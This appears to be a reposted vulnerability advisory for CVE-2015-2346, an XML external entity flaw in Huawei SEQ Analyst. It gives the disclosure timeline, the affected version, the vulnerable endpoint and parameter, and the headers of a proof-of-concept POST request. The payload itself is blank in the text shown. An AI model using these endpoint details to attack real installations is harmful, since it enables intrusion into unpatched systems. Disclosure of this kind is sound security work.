#Document Title: ============ Huawei SEQ Analyst - XML External Entity Injection (XXE) #Release Date: =========== 15 Apr 2015 #CVE-ID: ======= CVE-2015-2346 #Product & Service Introduction: ======================= SEQ Analyst is a platform for business quality monitoring and management by individual user and multiple vendors in a quasi-realtime and retraceable manner More Details & Manual ; http://ift.tt/1PPwFlH #Vulnerability Disclosure Timeline: ======================== 3 Mar 2015 Bug reported to the vendor. 6 Mar 2015 Vendor returned ; investigating 16 Mar 2015 Asked about the case. 16 Mar 2015 Vendor has validated the issue. 17 Mar 2015 There aren't any fix the issue. 18 Mar 2015 CVE number assigned 15 Apr 2015 Fixed #Affected Product(s): =============== Huawei Technologies Co. Ltd. Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be vulnerable) #Exploitation Technique: ================= Local, Authenticated #Technical Details: ======================== Target Path: /monitor/flexdata.action Sample Payload : Affected Parameter: req #Proof of Concept (PoC): ================== http://ift.tt/1zi0wJe Request: POST /monitor/flexdata.action HTTP/1.1 Host: ***:8443 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US; locale=en_US; locked=false; timeNum=1425365144829; timeState=true; loginUserName=testsms; CASTGC=TGT-549- skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false Connection: keep-alive Referer: https:// ***:8443/monitor/flexrelease/http://ift.tt/1PPwFlL Content-type: application/x-www-form-urlencoded Content-Length: 136 req=
No comments:
Post a Comment